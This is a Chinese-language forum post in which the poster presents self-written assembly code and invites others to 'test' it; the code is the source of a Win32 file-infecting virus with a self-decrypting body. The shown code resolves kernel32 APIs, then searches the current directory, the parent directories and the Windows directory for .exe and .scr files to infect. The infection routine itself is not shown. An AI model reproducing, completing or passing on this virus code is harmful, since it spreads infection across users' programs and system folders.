一个奇怪的病毒。。。有胆测试者进
最近写了个程序，希望有人测试一下
代码如下：
.586p
.MODEL FLAT, STDCALL
INCLUDE C:\TOOLS\TASM\INCLUDE\WIN32API.INC
INCLUDE C:\TOOLS\TASM\INCLUDE\WINDOWS.INC
EXTRN ExitProcess:PROC
EXTRN MessageBoxA:PROC
.CONST
PAGINAS EQU 50d
KERNEL_9X EQU 0BFF70000h
GPA_HARDCODE EQU 0BFF76DACh
CRLF EQU <0Dh, 0Ah>
TAMA_VIRUS EQU (TERMINA_VIRUS - EMPIEZA_VIRUS)
TAMA_ENCRIPTADO EQU (TERMINA_VIRUS - EMPIEZA_CRYPT)
TAMA_DESENCRIPTOR EQU (EMPIEZA_CRYPT - EMPIEZA_VIRUS)
RDTSC EQU <DW 310Fh>
.DATA
MENSJE DB "xxxxx", CRLF
DB "xxxxx", CRLF, CRLF
DB "xxxxxxxxxx "
DB TAMA_VIRUS / 10000 MOD 10 + 30h
DB TAMA_VIRUS / 1000 MOD 10 + 30h
DB TAMA_VIRUS / 100 MOD 10 + 30h
DB TAMA_VIRUS / 10 MOD 10 + 30h
DB TAMA_VIRUS / 1 MOD 10 + 30h
DB 00h
TITLO DB "-= SRX =-", 00h
.CODE
SRX:
XOR EBP, EBP
JMP EMPIEZA_CRYPT
EMPIEZA_VIRUS LABEL NEAR
CALL @LA_YUCA
@ER_DERTA:
SUB EDX, OFFSET @ER_DERTA
JMP @EL_MONTE
@LA_YUCA:
POP EDX
JMP @ER_DERTA
@EL_MONTE:
XCHG EDX, EBP
MOV AL, 00h
ORG $-1
LLAVEX DB 00h
MOV ECX, TAMA_ENCRIPTADO
LEA ESI, OFFSET [EBP + EMPIEZA_CRYPT]
@@DC:
ADD BYTE PTR [ESI], AL
INC ESI
DEC AL
LOOP @@DC
PUSH OFFSET EMPIEZA_CRYPT
ADD DWORD PTR [ESP], EBP
JMP @Decriptor_2
EMPIEZA_CRYPT LABEL NEAR
JMP @@1
DB " [ALMA] "
@@1:
CALL Desencriptar_Datos
MOV EDI, DWORD PTR [ESP]
CALL Seh_Handler
MOV ESP, DWORD PTR [ESP+8h]
JMP _REVOL
Seh_Handler:
XOR EAX, EAX
PUSH DWORD PTR FS:[EAX]
MOV FS:[EAX], ESP
CALL BUSCA_KERNEL32
MOV DWORD PTR [EBP + KERNEL32], EAX
CALL BUSCA_GPA
MOV DWORD PTR [EBP + GetProcAddress], EAX
LEA EDI, OFFSET [EBP + Tabla_APIs_KERNEL32]
LEA ESI, OFFSET [EBP + CreateFileA]
CALL BUSCA_APIs
INC EAX
JZ _REVOL
LEA EAX, OFFSET [EBP + DIR_ORIGINAL]
PUSH EAX
PUSH MAX_PATH
CALL [EBP + GetCurrentDirectoryA]
OR EAX, EAX
JZ _REVOL
Busca_Primero:
LEA EAX, OFFSET [EBP + Busqueda]
PUSH EAX
LEA EAX, OFFSET [EBP + Todo]
PUSH EAX
CALL [EBP + FindFirstFileA]
MOV DWORD PTR [EBP + SHandle], EAX
INC EAX
JZ Recupera_Directorio
DEC EAX
LaMamada:
LEA EDI, OFFSET [EBP + Busqueda.wfd_szFileName]
XOR EAX, EAX
MOV AL, "."
@@Z:
SCASB
JNZ @@Z
MOV EAX, DWORD PTR [EDI-1h]
OR EAX, 20202020h
CMP EAX, "exe."
JE Infecta_Este_Exe
CMP EAX, "rcs."
JE Infecta_Este_Exe
Busca_Proximo:
LEA EAX, OFFSET [EBP + Busqueda]
PUSH EAX
PUSH DWORD PTR [EBP + SHandle]
CALL [EBP + FindNextFileA]
OR EAX, EAX
JNZ LaMamada
PUSH DWORD PTR [EBP + SHandle]
CALL [EBP + FindClose]
LEA EAX, OFFSET [EBP + Puto_Puto]
PUSH EAX
CALL [EBP + SetCurrentDirectoryA]
OR EAX, EAX
JZ Recupera_Directorio
LEA EAX, OFFSET [EBP + Busqueda.wfd_szFileName]
PUSH EAX
PUSH MAX_PATH
CALL [EBP + GetCurrentDirectoryA]
OR EAX, EAX
JE Termina_Directa
CMP DWORD PTR [EBP + Grueso], EAX
JE Termina_Directa
MOV DWORD PTR [EBP + Grueso], EAX
JMP Busca_Primero
Termina_Directa:
CMP BYTE PTR [EBP + WinDir_Infectado], TRUE
JZ Recupera_Directorio
MOV BYTE PTR [EBP + WinDir_Infectado], TRUE
PUSH MAX_PATH
LEA EAX, OFFSET [EBP + Busqueda.wfd_szFileName]
PUSH EAX
CALL [EBP + GetWindowsDirectoryA]
OR EAX, EAX
JZ Recupera_Directorio
LEA EAX, OFFSET [EBP + Busqueda.wfd_szFileName]
PUSH EAX
CALL [EBP + SetCurrentDirectoryA]
JMP Busca_Primero
Recupera_Directorio:
LEA EAX, OFFSET [EBP + Dir_Original]
CALL [EBP + SetCurrentDirectoryA]
_REVOL:
XOR EAX, EAX
POP DWORD PTR FS:[EAX]
POP ECX
DB 068h ; PUSH
RETORNA DD OFFSET _PrimGen ; Primera Generacion
RET
Infecta_Este_Exe:
LEA EBX, OFFSET [EBP + Busqueda.wfd_szFileName]
CALL Infecta_Exe
JMP Busca_Proximo